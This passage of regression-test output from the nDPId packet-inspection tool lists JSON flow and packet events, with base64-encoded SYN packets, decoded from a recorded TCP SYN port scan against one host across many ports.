-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsUMkAACkGzqmsEAAIQA2GNIzTAP\/dU4MZAAAAAGACCAAvjQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs188AADYGOqOsEAAIQA2GNIzTIczdU4MZAAAAAGACDAAKwAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsywEAACkGVHGsEAAIQA2GNIzTA+DdU4MZAAAAAGACCAAsrAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs13sAADoGNvesEAAIQA2GNIzTDcfdU4MZAAAAAGACDAAexQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAstKwAADMGYMasEAAIQA2GNIzTI4LdU4MZAAAAAGACEAAFCgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs+qYAAC8GHsysEAAIQA2GNIzTINLdU4MZAAAAAGACEAAHugAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs5fwAADcGK3asEAAIQA2GNIzTA\/LdU4MZAAAAAGACEAAkmgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsD7YAADgGAL2sEAAIQA2GNIzTH5ndU4MZAAAAAGACBAAU8wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs2pkAADYGN9msEAAIQA2GNIzTDmrdU4MZAAAAAGACDAAeIgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsxEMAADMGUS+sEAAIQA2GNIzTA4bdU4MZAAAAAGACEAAlBgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAssU4AACUGciSsEAAIQA2GNIzSB7PdUoMYAAAAAGACCAAo3AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsC18AACUGGBSsEAAIQA2GNIzSFGbdUoMYAAAAAGACCAAcKQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs4dwAAC4GOJasEAAIQA2GNIzSBEzdUoMYAAAAAGACDAAoQwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsC\/AAACUGF4OsEAAIQA2GNIzSGgzdUoMYAAAAAGACCAAWgwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsuskAACwGYamsEAAIQA2GNIzSIZjdUoMYAAAAAGACBAAS9wAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsXBEAACwGwGGsEAAIQA2GNIzSE4jdUoMYAAAAAGACBAAhBwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs5JMAADoGKd+sEAAIQA2GNIzSAsrdUoMYAAAAAGACDAApxQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAshEYAADgGjCysEAAIQA2GNIzSHvHdUoMYAAAAAGACBAAVngAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAspVMAADMGcB+sEAAIQA2GNIzSF+DdUoMYAAAAAGACEAAQrwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAskd4AACkGjZSsEAAIQA2GNIzSxHzdUoMYAAAAAGACCABsEgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsN+wAAC4G4oasEAAIQA2GNIzSGAzdUoMYAAAAAGACDAAUgwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ2YAADQG7QysEAAIQA2GNIzSNdfdUoMYAAAAAGACBAD+twAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAs1wMAADAGQW+sEAAIQA2GNIzSH0fdUoMYAAAAAGACBAAVSAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_packet_id":1,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060287,"pkt":"ACYLMQczACWzv5HuCABFAAAsnrUAADMGdr2sEAAIQA2GNIzSgAXdUoMYAAAAAGACEACoiQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060287,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 